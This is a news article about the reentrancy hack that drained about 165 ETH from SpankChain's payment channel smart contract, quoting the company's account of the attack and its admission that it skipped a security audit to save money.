Hackers have exploited a bug in the smart contracts of an adult industry focused cryptocurrency.
The Ethereum based smart contract uses a smart token ‘creatively’ named BOOTY for adult industry enterprise SpankChain, who were on the receiving end of a £28,000 hacking by threat actors.
The company announced on Medium that: “At 6pm PST Saturday, an unknown attacker drained 165.38 ETH (~$38,000) from our payment channel smart contract which also resulted in $4,000 worth of BOOTY on the contract becoming immobilized.”
The threat actor’s poor conduct went unnoticed for a whole day until SpankChain realised on Sunday at 7pm, getting a grip with the seriousness of the situation the company suspended all of its online services while it tried to contain the issue.
SpankChain have suspended its website while it redeploys the payment channel smart contract with a patch to stop further attacks. It will also refund all users who have been affected by the hack.
The company stated in the post that the: “Attack capitalized on a “reentrancy” bug, much like the one exploited in The DAO. The attacker created a malicious contract masquerading as an ERC20 token, where the “transfer” function called back into the payment channel contract multiple times, draining some ETH each time.”
“The malicious contract first called createChannel to set up the channel, then called LCOpenTimeout repeatedly via reentrancy. The LCOpenTimeout is there to allow users to quickly exit payment channels which have not yet been joined by the counter-party,” they reported.
SpankChain admitted that the problem is mostly their fault as for a previous unidirectional payment channels library they operated they had Zeppelin conduct an audit which cost $17,000, this they felt was a bit too expensive.
So when it came to do the same security diligence on a: “Far more sophisticated non-custodial payment channel contract” the company decided that the quoted $30,000 – $50,000 for the security audit was too costly.
Fortunately after receiving a hard spanking the company has learnt their lesson noting that: “Taking into account both the perception value and opportunity cost of the time spent reacting to the hack, it would have been worth it.”